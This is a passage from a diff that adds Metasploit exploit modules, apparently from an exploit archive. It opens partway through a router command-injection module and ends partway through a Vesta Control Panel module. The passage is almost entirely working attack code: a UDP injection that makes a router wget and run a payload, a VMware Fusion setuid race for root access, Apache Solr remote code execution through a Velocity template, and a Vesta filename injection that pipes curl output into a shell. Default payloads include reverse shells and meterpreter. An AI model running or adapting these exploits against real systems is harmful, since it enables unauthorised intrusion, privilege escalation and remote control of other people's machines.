new_packet += packet[6..-1]
end
def exec_cmd_file(packet)
# This function handles special action of exec
# Returns new complete tpdp packet
inject = "\';sh #{@cmd_file}\'"
payload = create_injection(inject)
ciphertext = aes_encrypt(payload)
if not ciphertext
fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
end
new_packet = packet[0..15]
new_packet += ciphertext
new_packet = update_len_field(new_packet, ciphertext.length)
calc_checksum(new_packet.bytes)
end
# Handle incoming requests from the router
def on_request_uri(cli, request)
print_good("#{peer} - Sending executable to the router")
print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
send_response(cli, @payload_exe)
@payload_sent = true
end
def exploit
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
end
if datastore['SSL']
fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it")
end
print_status("Attempting to exploit #{target.name}")
tpdp_packet_template =
[0x01].pack('C*') + # packet version, fixed to 1
[0xf0].pack('C*') + # set packet type to 0xf0 (onemesh)
[0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table
[0x00].pack('S>*') + # packet len
[0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function
[0x00].pack('C*') + # dunno what this is
[rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value
[0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder
srv_host = datastore['SRVHOST']
srv_port = datastore['SRVPORT']
@cmd_file = rand_text_alpha_lower(1)
# generate our payload executable
@payload_exe = generate_payload_exe
# Command that will download @payload_exe and execute it
download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
http_service = 'http://' + srv_host + ':' + srv_port.to_s
print_status("Starting up our web service on #{http_service} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => "/#{@cmd_file}"
}})
print_status("#{peer} - Connecting to the target")
connect_udp
print_status("#{peer} - Sending command file byte by byte")
print_status("#{peer} - Command: #{download_cmd}")
mod = download_cmd.length / 5
download_cmd.each_char.with_index { |c, index|
# Generate payload
payload = create_injection(c)
if not payload
fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!")
end
# Encrypt payload
ciphertext = aes_encrypt(payload)
if not ciphertext
fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
end
tpdp_packet = tpdp_packet_template.dup
tpdp_packet += ciphertext
tpdp_packet = update_len_field(tpdp_packet, ciphertext.length)
tpdp_packet = calc_checksum(tpdp_packet.bytes)
udp_sock.put(tpdp_packet)
# Sleep to make sure the payload is processed by a target
Rex.sleep(1)
# Print progress
if ((index+1) % mod == 0)
percentage = 20 * ((index+1) / mod)
# very advanced mathemathics in use here to show the progress bar
print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]")
if percentage == 100
# a bit of cheating to get the last char done right
index = -2
end
#print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}")
end
}
# Send the exec command. From here we should receive the connection
print_status("#{peer} - Command file sent, attempting to execute...")
tpdp_packet = exec_cmd_file(tpdp_packet_template.dup)
udp_sock.put(tpdp_packet)
timeout = 0
while not @payload_sent
Rex.sleep(1)
timeout += 1
if timeout == datastore['MAX_WAIT'].to_i
fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(")
end
end
disconnect_udp
end
end

240
exploits/macos/local/48337.rb Executable file
View file

@ -0,0 +1,240 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::OSX::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
'Description' => %q(
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
The Open VMware USB Arbitrator Service can be launched outide of its standard path
which allows loading of an attacker controlled binary. By creating a payload in the
user home directory in a specific folder, and creating a hard link to the 'Open VMware
USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
with an effective UID of 0.
@jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race.
Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
),
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Dhanesh Kizhakkinan', # discovery
'Rich Mirch', # edb module
'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
'grimm'
],
'Platform' => [ 'osx' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'CVE', '2020-3950' ],
[ 'EDB', '48235' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
[ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
[ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
],
'DisclosureDate' => 'Mar 17 2020',
'DefaultOptions' =>
{
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
'WfsDelay' => 15
}
)
)
register_options [
OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end
def open_usb_service
'Open VMware USB Arbitrator Service'
end
def usb_service
'VMware USB Arbitrator Service'
end
def get_home_dir
home = cmd_exec 'echo ~'
if home.blank?
fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
end
home
end
def content_dir
"#{get_home_dir}/Contents"
end
def base_dir
"#{content_dir}/Library/services/"
end
def kill_process(executable)
pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
cmd_exec pid_kill
end
def get_version
# Thanks to @ddouhine on github for this answer!
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
/=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
if version_raw.blank?
fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
end
Gem::Version.new(version)
end
def pre_11_5_3
# Upload payload executable & chmod
payload_filename = "#{base_dir}#{usb_service}"
print_status "Uploading Payload: #{payload_filename}"
write_file payload_filename, generate_payload_exe
chmod payload_filename, 0o755
register_file_for_cleanup payload_filename
# create folder structure and hard link to the original binary
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
print_status "Created folder (#{link_folder}) and link"
print_status 'Starting USB Service (5 sec pause)'
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
Rex.sleep 5 # give time for the service to execute our payload
print_status 'Killing service'
cmd_exec "pkill '#{open_usb_service}'"
print_status "Deleting #{root_link_folder}"
rm_rf root_link_folder
end
def exactly_11_5_3
# Upload payload executable & chmod
payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
print_status "Uploading Payload to #{payload_name}"
write_file payload_name, generate_payload_exe
chmod payload_name, 0o755
#create race with codesign check
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
print_status 'Uploading race condition executable.'
race = <<~EOF
#!/bin/sh
while [ "1" = "1" ]; do
ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
done
EOF
racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx racer_name, race
register_file_for_cleanup racer_name
register_dirs_for_cleanup root_link_folder
# create the hard link
print_status "Creating folder (#{link_folder}) and link"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
# create the launcher to start the racer and keep launching our service to attempt to win
launcher = <<~EOF
#!/bin/sh
#{racer_name} &
for i in {1..#{datastore['MAXATTEMPTS']}}
do
echo "attempt $i";
'#{link_folder}#{open_usb_service}'
done
EOF
runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx runner_name, launcher
register_file_for_cleanup runner_name
print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
results = cmd_exec "#{runner_name} & :"
Rex.sleep 15 # give time for the service to execute our payload
vprint_status results
print_status 'Exploit Finished, killing scripts.'
kill_process racer_name
kill_process runner_name # in theory should be killed already but just in case
kill_process "'#{link_folder}#{open_usb_service}'"
# kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
# above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
# rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
end
def check
unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
print_bad "'#{open_usb_service}' binary missing"
return CheckCode::Safe
end
version = get_version
if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
vprint_good "Vmware Fusion #{version} is exploitable"
else
print_bad "VMware Fusion #{version} is NOT exploitable"
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
# First check the system is vulnerable, or the user wants to run regardless
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
# Check if we're already root
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
end
# Make sure we can write our payload to the remote system
rm_rf content_dir # live dangerously.
if directory? content_dir
fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
end
cmd_exec "mkdir -p #{base_dir}"
register_dirs_for_cleanup content_dir
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable."
end
version = get_version
if version == Gem::Version.new('11.5.3')
vprint_status 'Using 11.5.3 exploit'
exactly_11_5_3
elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
vprint_status 'Using pre-11.5.3 exploit'
pre_11_5_3
end
rm_rf content_dir # live dangerously.
end
end

504
exploits/multiple/remote/48338.rb Executable file
View file

@ -0,0 +1,504 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Solr Remote Code Execution via Velocity Template',
'Description' => %q(
This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom
Velocity template. Currently, this module only supports Solr basic authentication.
From the Tenable advisory:
An attacker could target a vulnerable Apache Solr instance by first identifying a list
of Solr core names. Once the core names have been identified, an attacker can send a specially crafted
HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
template parameter in a specially crafted Solr request, leading to RCE.
),
'License' => MSF_LICENSE,
'Author' =>
[
's00py', # Discovery and PoC
'jas502n', # exploit code on Github
'AleWong', # ExploitDB contribution, and exploit code on Github
'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
],
'References' =>
[
[ 'EDB', '47572' ],
[ 'CVE', '2019-17558' ],
[ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'],
[ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'],
[ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
[ 'URL', 'https://github.com/jas502n/solr_rce'],
[ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
],
'Platform' => ['linux', 'unix', 'win'],
'Targets' =>
[
[
'Unix (in-memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
],
[
'Linux (dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'CmdStagerFlavor' => %w[curl wget]
}
],
[
'x86/x64 Windows PowerShell',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_psh,
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
}
],
[
'x86/x64 Windows CmdStager',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_cmdstager,
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
'CmdStagerFlavor' => %w[vbs certutil]
}
],
[
'Windows Exec',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :windows_exec,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' }
}
],
],
'DisclosureDate' => "2019-10-29", # ISO-8601 formatted
'DefaultTarget' => 0,
'Privileged' => false
)
)
register_options(
[
Opt::RPORT(8983),
OptString.new('USERNAME', [false, 'Solr username', 'solr']),
OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks']),
OptString.new('TARGETURI', [false, 'Path to Solr', '/solr/'])
]
)
end
# if we are going to exploit, we only need one core to be exploitable
@vuln_core = ""
# OS specific stuff
@target_platform = ""
# if authentication is used
@auth_string = ""
def check_auth
# see if authentication is required for the specified Solr instance
auth_check = solr_get('uri' => normalize_uri(target_uri.path))
# successfully connected?
unless auth_check
print_bad("Connection failed!")
return nil
end
# if response code is not 200, then the Solr instance definitely requires authentication
unless auth_check.code == 200
# if authentication is required and creds are not provided, we cannot reliably check exploitability
if datastore['USERNAME'] == "" && datastore['PASSWORD'] == ""
print_bad("Credentials not provided, skipping credentialed check...")
return nil
end
# otherwise, try the given creds
auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string)
# successfully connected?
unless attempt_auth
print_bad("Connection failed!")
return nil
end
# if the return code is not 200, then authentication definitely failed
unless attempt_auth.code == 200
print_bad("Invalid credentials!")
return nil
end
store_valid_credential(
user: datastore['USERNAME'],
private: datastore['PASSWORD'],
private_type: :password,
proof: attempt_auth.to_s
)
@auth_string = auth_string
end
# a placeholder return value. Not requiring auth should throw no errors
""
end
# check for vulnerability existence
def check
auth_res = check_auth
unless auth_res
return CheckCode::Unknown("Authentication failed!")
end
# send a GET request to get Solr and system details
ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string)
# can't connect? that's an automatic failure
unless ver
return CheckCode::Unknown("Connection failed!")
end
# convert to JSON
ver_json = ver.get_json_document
# get Solr version
solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
print_status("Found Apache Solr #{solr_version}")
# get OS version details
@target_platform = ver_json['system']['name']
target_arch = ver_json['system']['arch']
target_osver = ver_json['system']['version']
print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}")
# uname doesn't show up for Windows, so run a check for that
if ver_json['system']['uname']
# print uname only when verbose
vprint_status("Full uname is '#{ver_json['system']['uname'].strip}'")
end
# the vulnerability is only present in Solr versions <= 8.3.0
unless solr_version <= Gem::Version.new('8.3.0')
return CheckCode::Safe("Running version of Solr is not vulnerable!")
end
# enumerate cores
cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string)
# can't connect? that's yet another automatic failure
unless cores
return CheckCode::Unknown("Could not enumerate cores!")
end
# convert to JSON yet again
cores_json = cores.get_json_document
# draw up an array of all the cores
cores_list = Array.new
# get the core names
cores_json['status'].keys.each do |core_name|
cores_list.push(core_name)
end
# no cores? that means nothing to exploit.
if cores_list.empty?
return CheckCode::Safe("No cores found, nothing to exploit!")
end
# got cores? tell the operator which cores were found
print_status("Found core(s): #{cores_list.join(', ')}")
possibly_vulnerable_cores = {}
cores_list.each do |core|
# for each core, attempt to get config
core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string)
# can't retrieve configuration for that core? go next
unless core_config
print_error("Could not retrieve configuration for core #{core}!")
next
end
# convert to JSON
core_config_json = core_config.get_json_document
# if the core configuration does not include the Velocity Response Writer, it isn't vulnerable
if core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
vprint_good("Found Velocity Response Writer in use by core #{core}")
if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.")
possibly_vulnerable_cores.store(core, true)
else
# if params.resource.loader.enabled is false, we need to set it to true before exploitation
print_warning("params.resource.loader.enabled for core #{core} is set to false.")
possibly_vulnerable_cores.store(core, false)
end
else
vprint_error("Velocity Response Writer not found in core #{core}")
next
end
end
# look at the array of possibly vulnerable cores
if possibly_vulnerable_cores.empty?
CheckCode::Safe("No cores are vulnerable!")
else
# if possible, pick a core that already has params.resource.loader.enabled set to true
possibly_vulnerable_cores.each do |core|
if core[1] == true
@vuln_core = core
break
end
end
# otherwise, just pick the first one
if @vuln_core.to_s == ""
@vuln_core = possibly_vulnerable_cores.first
end
CheckCode::Vulnerable
end
end
# the exploit method
def exploit
unless [CheckCode::Vulnerable].include? check
fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
end
print_status("Targeting core '#{@vuln_core[0]}'")
# if params.resource.loader.enabled for that core is false
if @vuln_core[1] != true
# the new config in JSON format
enable_params_resource_loader = {
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}.to_json
opts_post = {
'method' => 'POST',
'connection' => 'Keep-Alive',
'ctype' => 'application/json;charset=utf-8',
'encode_params' => false,
'uri' => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
'data' => enable_params_resource_loader
}
unless @auth_string == ""
opts_post.store('authorization', @auth_string)
end
print_status("params.resource.loader.enabled is false, setting it to true...")
update_config = send_request_cgi(opts_post)
unless update_config
fail_with Failure::Unreachable, "Connection failed!"
end
# if we got anything other than a 200 back, the configuration update failed and the exploit won't work
unless update_config.code == 200
fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
end
print_good("params.resource.loader.enabled is now set to true!")
end
# windows...
if @target_platform.include? "Windows"
# if target is wrong, warn and exit before doing anything
unless target.name.include? "Windows"
fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
end
case target['Type']
# PowerShell...
when :windows_psh
# need PowerShell for this
winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true)
unless winenv_path
fail_with Failure::Unreachable, "Connection failed!"
end
# did the command to check for PATH execute?
unless winenv_path.code == 200
fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!"
end
# is PowerShell in PATH?
if /powershell/i =~ winenv_path.body.to_s
# only interested in the contents of PATH. Everything before it is irrelevant
paths = winenv_path.body.split('=')[1]
# confirm that PowerShell exists in the PATH by checking each one
paths.split(';').each do |path_val|
# if PowerShell exists in PATH, then we are good to go
unless /powershell/i =~ path_val
next
end
print_good("Found Powershell at #{path_val}")
# generate PowerShell command, encode with base64, and remove comspec
psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
# specify full path to PowerShell
psh_cmd.insert(0, path_val)
# exploit the thing
execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
break
end
else
fail_with Failure::BadConfig, "PowerShell not found!"
end
# ... CmdStager ...
when :windows_cmdstager
print_status("Sending CmdStager payload...")
execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
# ... or plain old exec?
when :windows_exec
cmd = "C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}"
execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
end
end
# ... or nix-based?
if @target_platform.include? "Linux"
# if target is wrong, warn and exit before doing anything
if target.name.include? "Windows"
fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!"
end
case target['Type']
when :linux_dropper
execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
when :unix_memory
cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
end
end
end
# some prep work has to be done to work around the limitations of Java's Runtime.exec()
def execute_cmdstager_begin(_opts)
if @target_platform.include? "Windows"
@cmd_list.each do |command|
command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ")
end
else
@cmd_list.each do |command|
command.insert(0, "/bin/bash -c $@|/bin/bash . echo ")
end
end
end
# sic 'em, bois!
def execute_command(cmd, opts = {})
# custom template which enables command execution
template = <<~VELOCITY
#set($x="")
#set($rt=$x.class.forName("java.lang.Runtime"))
#set($chr=$x.class.forName("java.lang.Character"))
#set($str=$x.class.forName("java.lang.String"))
VELOCITY
# attempts to solve the quoting problem, partially successful
if target.name.include?("Unix")
template += <<~VELOCITY
#set($ex=$rt.getRuntime().exec("#{cmd}"))
VELOCITY
else
template += <<~VELOCITY
#set($ex=$rt.getRuntime().exec('#{cmd}'))
VELOCITY
end
template += <<~VELOCITY
$ex.waitFor()
VELOCITY
# the next 2 lines cause problems with CmdStager, so it's only used when needed
# during the check for PowerShell existence, or by specific payloads
if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory
template += <<~VELOCITY
#set($out=$ex.getInputStream())
#if($out.available())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
#else
#end
VELOCITY
end
# execute the exploit...
raw_result = solr_get(
'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
'auth' => opts['auth_string'],
'vars_get' => {
'q' => '1',
'wt' => 'velocity',
'v.template' => 'custom',
'v.template.custom' => template
}
)
# Executing PATH always gives a result, so it can return safely
if opts['winenv_check']
return raw_result
end
# for printing command output
unless raw_result.nil?
unless raw_result.code == 200
fail_with Failure::PayloadFailed, "Payload failed to execute!"
end
# to get pretty output
result_inter = raw_result.body.to_s.sub("0\n", ":::").split(":::").last
unless result_inter.nil?
final_result = result_inter.split("\n").first.strip
print_good(final_result)
end
end
end
# make sending requests easier
def solr_get(opts = {})
send_request_cgi_opts = {
'method' => 'GET',
'connection' => 'Keep-Alive',
'uri' => opts['uri']
}
# @auth_string defaults to "" if no authentication is necessary
# otherwise, authentication is required
if opts['auth'] != ""
send_request_cgi_opts.store('authorization', opts['auth'])
end
# a bit unrefined, but should suffice in this case
if opts['vars_get']
send_request_cgi_opts.store('vars_get', opts['vars_get'])
end
send_request_cgi(send_request_cgi_opts)
end
end

239
exploits/multiple/webapps/48294.rb Executable file
View file

@ -0,0 +1,239 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "Vesta Control Panel Authenticated Remote Code Execution",
'Description' => %q{
This module exploits command injection vulnerability in v-list-user-backups bash script file.
Low privileged authenticated users can execute arbitrary commands under the context of the root user.
An authenticated attacker with a low privileges can inject a payload in the file name starts with dot.
During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As
result of that backup process, when an attacker try to list existing backups injected payload will be
executed.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
['CVE', '2020-10808']
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 8083,
'WfsDelay' => 300,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => "Mar 17 2020",
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(8083),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'The password to login with']),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
]
)
deregister_options('FTPUSER', 'FTPPASS')
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def login
#
# This is very simple login process. Nothing important.
# We will be using cookie and csrf_token across the module so that we are global variable.
#
print_status('Retrieving cookie and csrf token values')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login', '/'),
})
if res && res.code == 200 && !res.get_cookies.empty?
@cookie = res.get_cookies
@csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
if @csrf_token.empty?
fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
end
else
fail_with(Failure::Unknown, 'Something went wrong.')
end
print_good('Cookie and CSRF token values successfully retrieved')
print_status('Authenticating to HTTP Service with given credentials')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login', '/'),
'cookie' => @cookie,
'vars_post' => {
'token' => @csrf_token,
'user' => username,
'password' => password
}
})
if res && res.code == 302 && !res.get_cookies.empty?
print_good('Successfully authenticated to the HTTP Service')
@cookie = res.get_cookies
else
fail_with(Failure::Unknown, 'Credentials are not valid.')
end
end
def is_scheduled_backup_running
res = trigger_scheduled_backup
#
# MORE explaination.
#
if res && res.code == 302
res = trigger_payload
if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
return true
else
print_good('It seems scheduled backup is done ..! Triggerring payload <3')
return false
end
else
fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?')
end
return false
end
def trigger_payload
res = send_request_cgi({
'method' => 'GET',
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
})
if res && res.code == 200
res
else
fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?')
end
end
def trigger_scheduled_backup
res = send_request_cgi({
'method' => 'GET',
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
})
if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
res
else
fail_with(Failure::Unknown, 'Something went wrong.')
end
end
def payload_implant
#
# Our payload will be placed as a file name on FTP service.
# Payload lenght can't be more then 255 and SPACE can't be used because of the
# bug in the backend software. Due to these limitations, I used web delivery method.
#
# When the initial payload executed. It will execute very short perl command, which is going to fetch
# actual python meterpreter first stager and execute it.
#
final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
# Yet another datastore variable overriding.
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
port_restore = datastore['RPORT']
datastore['RPORT'] = 21
datastore['FTPUSER'] = username
datastore['FTPPASS'] = password
#
# Connecting to the FTP service with same creds as web ui.
# Implanting the very first stage of payload as a empty file.
#
if (not connect_login)
fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
end
print_good('Successfully authenticated to the FTP service')
res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
if res.nil?
fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
end
print_good('Successfully uploaded the payload as a file name')
disconnect
# Revert datastore variables.
datastore['RPORT'] = port_restore
datastore['SSL'] = true if ssl_restore
end
def exploit
start_http_server
payload_implant
login
trigger_scheduled_backup
print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.')
while is_scheduled_backup_running == true
print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...')
Rex.sleep(30)
end
stop_service
end
def on_request_uri(cli, request)
print_good('First stage is executed ! Sending 2nd stage of the payload')
second_stage = "python -c \"#{payload.encoded}\""
send_response(cli, second_stage, {'Content-Type'=>'text/html'})
end
def start_http_server
#
# HttpClient and HttpServer use same SSL variable :(
# We don't need a SSL for payload delivery.
#
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
